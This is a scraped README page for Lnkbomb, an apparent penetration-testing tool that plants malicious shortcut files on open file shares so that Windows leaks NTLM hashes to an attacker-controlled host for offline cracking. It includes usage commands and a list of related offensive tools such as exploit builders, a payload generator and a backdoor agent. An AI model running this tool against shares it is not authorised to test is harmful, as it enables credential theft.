Lnkbomb - Malicious shortcut generator for collecting NTLM hashes from insecure file shares

Related tags

Security related resources lnkbomb
Overview

Lnkbomb

ko-fi

Lnkbomb is used for uploading malicious shortcut files to insecure file shares. The vulnerability exists due to Windows looking for an icon file to associate with the shortcut file. This icon file can be directed to a penetration tester's machine running Responder or smbserver to gather NTLMv1 or NTLMv2 hashes (depending on configuration of the victim host machine). The tester can then attempt to crack those collected hashes offline with a tool like Hashcat.

The payload file is uploaded directly to the insecure file specified by the tester in the command line. The tester includes their IP address as well, which is written into the payload.

Usage

Installing Lnkbomb

git clone https://github.com/dievus/lnkbomb.git

Change directories to lnkbomb and run:

python3 lnkbomb.py -h

This will output the help menu, which contains the following flags:

-h, --help - Lists the help options

-t, --target - Specifies the target file share (ex. -t \\192.168.1.1\Share)

-a, --attacker - Specifies the tester's attack machine (ex. -a 192.168.1.2)

-r, --recover - Used to remove the payload when testing is completed (ex. -r randomfilegenerated.recover)

Examples of full commands include:

python3 lnkbomb.py -t \\192.168.1.1\Share -a 192.168.1.2

python3 lnkbomb.py -r randomfilegenerated.recover

Notes

Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.

You might also like...
NoSecerets is a python script that is designed to crack hashes extremely fast. Faster even than Hashcat
NoSecerets is a python script that is designed to crack hashes extremely fast. Faster even than Hashcat

NoSecerets NoSecerets is a python script that is designed to crack hashes extremely fast. Faster even than Hashcat How does it work? Instead of taking

DosentTrust GithubDatabase 9 Jul 4, 2022
This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit
This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit

CVE-2021-40444 builders This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit. This repo is just for testing, re

ASL IT Security 168 Nov 9, 2022
Js File Scanner This is Js File Scanner
Js File Scanner This is Js File Scanner

Js File Scanner This is Js File Scanner . Which are scan in js file and find juicy information Toke,Password Etc.

null 122 Dec 12, 2022
Get important strings inside [Info.plist] & and Binary file also all output of result it will be saved in [app_binary].json , [app_plist_file].json file
Get important strings inside [Info.plist] & and Binary file also all output of result it will be saved in [app_binary].json , [app_plist_file].json file

Get important strings inside [Info.plist] & and Binary file also all output of result it will be saved in [app_binary].json , [app_plist_file].json file

null 12 Sep 28, 2022
MSDorkDump is a Google Dork File Finder that queries a specified domain name and variety of file extensions
MSDorkDump is a Google Dork File Finder that queries a specified domain name and variety of file extensions

MSDorkDump is a Google Dork File Finder that queries a specified domain name and variety of file extensions (pdf, doc, docx, etc), and downloads them.

Joe Helle 150 Jan 3, 2023
A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.
A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.

A simple python script to dump remote files through a local file read or local file inclusion web vulnerability. Features Dump a single file w

Podalirius 48 Dec 3, 2022
Password list generator for password spraying - prebaked with goodies
Password list generator for password spraying - prebaked with goodies

Generates permutations of Months, Seasons, Years, Sports Teams (NFL, NBA, MLB, NHL), Sports Scores, "Password", and even Iterable Keyspaces of a specified size.

Casey Erdmann 65 Dec 22, 2022
macOS Initial Access Payload Generator

Mystikal macOS Initial Access Payload Generator Related Blog Post: https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520 Usage: Install Xcode

Leo Pitt 206 Dec 31, 2022
A powerful password generator utility which utilizes the slot technique to generate strong passwords of required length having combinations of lower and upper characters, digits and symbols.

Bitpass Password Generator Installation Make sure Python 3+ is installed

Vaibhaw 6 Feb 2, 2022
Releases(v1.0)
Owner
Joe Helle
Also known as the Mayor
Joe Helle
GitHub
LdapRelayScan - Check for LDAP protections regarding the relay of NTLM authentication

LDAP Relay Scan A tool to check Domain Controllers for LDAP server protections r

null 315 Dec 18, 2022
AmiEviL - This program uses the Virus Total API to determine if your suspicious file is malicious or not

AmiEviL - This program uses the Virus Total API to determine if your suspicious file is malicious or not. The program requests the hash of the file and outputs information (if any). This version will output: the file type, names seen in the wild, the number of security vendors that have flagged it as malicious, undetected, and unable to process the file.

Kirk 1 Jan 3, 2022
Orthrus is a macOS agent that uses Apple's MDM to backdoor a device using a malicious profile.

Orthrus is a macOS agent that uses Apple's MDM to backdoor a device using a malicious profile. It effectively runs its own MDM server and allows the operator to interface with it using Mythic.

Mythic Agents 37 Dec 6, 2022
command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

CVE-2021-36260 CVE-2021-36260 POC command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validatio

Aiminsun 165 Dec 21, 2022
Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

CVE-2021-42694 Generate malicious files using recently published homoglyph-attack vulnerability, which was discovered at least in C, C++, C#, Go, Pyth

js-on 17 Dec 11, 2022
Generate malicious files using recently published bidi-attack (CVE-2021-42574)

CVE-2021-42574 - Code generator Generate malicious files using recently published bidi-attack vulnerability, which was discovered in Unicode Specifica

js-on 7 Nov 9, 2022
Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes

log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari

Ryan 5 Sep 12, 2022
A small utility to deal with malware embedded hashes.

Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

Abdallah Elshinbary 48 Dec 19, 2022
compact and speedy hash cracker for md5, sha1, and sha256 hashes

hash-cracker hash cracker is a multi-functional and compact...hash cracking tool...that supports dictionary attacks against three kinds of hashes: md5

Abdullah Ansari 3 Feb 22, 2022
BF-Hash - A Python Tool to decrypt hashes by brute force

BF-Hash Herramienta para descifrar hashes por fuerza bruta InstalaciĆ³n git clone

null 5 Apr 9, 2022